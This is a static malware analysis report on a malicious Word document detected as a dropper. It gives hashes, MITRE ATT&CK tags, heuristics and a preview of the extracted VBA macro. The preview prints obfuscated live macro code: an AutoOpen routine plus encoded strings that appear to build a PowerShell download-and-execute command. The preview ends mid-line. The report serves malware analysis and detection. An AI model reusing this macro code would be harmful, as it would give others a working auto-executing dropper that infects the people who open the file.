Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d4582df0dc9b7242…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 164.0 KB
Created: 2018-05-16 22:34:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: f03783d39ad80c83f71204aae8ffd84d
SHA-1: bd4226d05987243232f0a723ae879bd68e0e1291
SHA-256: d4582df0dc9b7242534bd79135d4c85480adb2b59549279a7dedf2fd9a7bdcef
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6546532-0' further suggests its role as a dropper. The macro's obfuscated nature and the presence of a Shell() call strongly imply it's designed to download and execute a secondary malicious payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6546532-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6546532-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 145074 bytes
SHA-256: ee51e4e59dcdc64239db94715bff4da0b91641523af297facc891507c6d4a39f
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CPfvccZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub EALTHq(NWujzN)
tpGRW = wPYjQk
akwha = RDtoS + CDbl(26096 - iFtbMO - HvsBVb + CDbl(53665)) - 68630 - CDbl(78732)
cDXpNd = NGuwQ
BnDiEr = 41825
End Sub
Sub WBItis(LwahOS)
PqDQb = OGTfq
qNRzXs = iGBOw + CDbl(68023 - iCIUOC - pYNanP + CDbl(2716)) - 66744 - CDbl(30267)
dDiBht = DpvnF
bHhpq = 22594
zQoOBp = WjcRw
TltBkw = HQZGu + CDbl(68382 - mTGaL - RiMOT + CDbl(37)) - 85395 - CDbl(80091)
TMdrPu = NjFtCq
qhURdR = 5732
CGZZlY = hkETiw
cDURw = ZURUa + CDbl(98582 - jwiOY - qKWRqI + CDbl(33658)) - 68104 - CDbl(96911)
pjMmd = RzMUw
hpFwl = 3977
End Sub
Sub jCpuEG(FldIf)
bzbkO = sbjkB
dmdhM = WPlOTz + CDbl(78858 - jbwjT - paciN + CDbl(40420)) - 70337 - CDbl(48206)
WCRor = TZYYml
lMfbv = 12382
QcAQwO = KuTrG
FPMBLz = MCaHhT + CDbl(49129 - QClZis - tCArcX + CDbl(18816)) - 58666 - CDbl(8694)
fnJVAd = zZUOC
jdoNtr = 65184
End Sub
Sub Autoopen()
On Error Resume Next
cFNWJ = UVICX
aBfPT = YVcEX + CDbl(57765 - KROnKP - WPDhwz + CDbl(82088)) - 55468 - CDbl(92330)
QSqjRh = ZtiTLp
ijfzj = 10763
RwojPbbJHWiHbQ (wmlzLw + wjlcNRFs + TUZvZA)
FnKsjR = QlTKZ
zNUrtq = RfFjFj + CDbl(98198 - ZFXmo - cvUGzo + CDbl(36711)) - 66573 - CDbl(1834)
olTwG = hCjGW
idnAS = 16387
End Sub
Sub jwYluX(zktCb)
insTPA = ZXUChN
NqTzW = rUVQA + CDbl(47703 - oAzJhf - vvlTlR + CDbl(16486)) - 33872 - CDbl(17968)
WDhUDI = tfQrK
bTqZL = 46466
KVCaH = EAOEB
LtuwrG = rjPBOv + CDbl(70959 - Jzurzt - QAAGMl + CDbl(7935)) - 31483 - CDbl(60894)
OQzXhW = SajtvT
iWouAT = 24640
jbctv = uznQka
flFbc = ZXNqVh + CDbl(25058 - pwJPMO - kXvob + CDbl(26294)) - 46257 - CDbl(51037)
cLtnzl = TXXnhT
HLiJFD = 59044
End Sub
Sub XLqvN(nBiBw)
NKnZc = Mqroa
QmncsE = XNcni + CDbl(95403 - XZfWp - kwXwYJ + CDbl(64335)) - 1280 - CDbl(81504)
IjkNib = KJdiZ
lXFbX = 63810
End Sub

Attribute VB_Name = "KVworRPrEiWSj"
Sub TDzka(CVMMEL)
lZShKT = imlwV
LfGaH = siSTI + CDbl(83783 - lloJmk - adSlBM + CDbl(97854)) - 58346 - CDbl(90064)
RBONkX = lEoSI
FKqMi = 33335
End Sub
Function wjlcNRFs()
On Error Resume Next
dzLomi = UZuQO
lBGdkB = ZXhvO + CDbl(33863 - MaKzQ - FCSpZ + CDbl(51867)) - 3904 - CDbl(20352)
MKXEVh = ENchD
GSPaU = 45747
UwVfVm = sbzbp
CfrSbf = anBzj + CDbl(12081 - SHiGp - jcijj + CDbl(89838)) - 19781 - CDbl(68040)
nsAtjw = uLUKHN
zVwPWG = 70695
DzHNFCzAVd = SEJBmV(".AB+3EB2Hcej3EB+3EBbo-3EB+3EBw3EB+3EBz2H+z23EB+3EBHe3CjNB5", 26284 + 6 - 26284, 26284 + 51 - 26284)
qlmRZA = mjVUn
JwpXQj = TmiwT + CDbl(90865 - KkincC - BPHRYh + CDbl(68083)) - 47682 - CDbl(76564)
mZinXH = FWXdEH
wiTzCB = 63891
Vljfrq = PcoWzW
JfiWN = APjAK + CDbl(87408 - PzdMNV - dzXPR + CDbl(70985)) - 52163 - CDbl(44830)
zXapX = aJqls
GFjVwF = 46550
qzoqcMLEQ = SEJBmV("aAlperc- 43]rAhC[,3EBaC43EBECAlperc- 29]rAhC[,)37]rAhC[+87]rAhC[+48]rAhC[(  ECAlperc-  )3EB}}{hcta'+'c};ka3EB+3'+'EBerb;)CDSfqo(3EB+3EB)z23EB+3EBHm3'+'EB+3EBetI-3EB94m9j6h", 84014 + 8 - 84014, 84014 + 162 - 84014)
zbIbG = KIOFcj
tjcjDN = XTWcc + CDbl(31886 - unuTf - FWYOw + CDbl(67446)) - 83684 - CDbl(92416)
vlIJW = YGlur
ufFfz = 81111
oIzSm = kwWTz
lKQkCj = JbMOwi + CDbl(38962 - KiDoAc - zCQqGp + CDbl(91376)) - 81047 - CDbl(17734)
iBvzf = FHILd
tzjSoa = 31837
KaAGTvZP = SEJBmV("Iu'F96i", 16390 + 5 - 16390, 16390 + 1 - 16390)
fwIvL = UMdwO
DwUjYk = hzhrRL + CDbl(44375 - RGnAV - pmhtz + CDbl(73608)) - 33117 - CDbl(62235)
dKwsYz = CtEvjW
FrkoGD = 10421
qIAuFf = IOMmrJ
MQTidM = jJCiB + CDbl(12053 - CYWMXN - MtZEGK + CDbl(82847)) - 76223 - CDbl(22424)
YMfYWE = MLiKw
QEYSGq = 80460
ijVmMv = SEJBmV("QI9lp+3EBr3EB+3EBt3EB+3EBSoTaC4.cfsafqo3EB+3EB(aC4el3EB+3EBJeD3EB+3EBIFda3EB+3EBOJeDln3EB+3EBWJ3EB+3EBeDoD3EB+3EB'+'aC4.'+'UYYfqo3EB+3EB{3EB+3EByrt{)XC'+'DAfq3EB+3EBo3EB+3EB 3E'+'B+3EBni cf3EB+3EL.kl", 80637 + 5 - 80637, 80637 + 190 - 80637)
UwIAWt = WCPswa
paHfU = ALiRN + CDbl(92046 - Ahskz - CEP
... (truncated)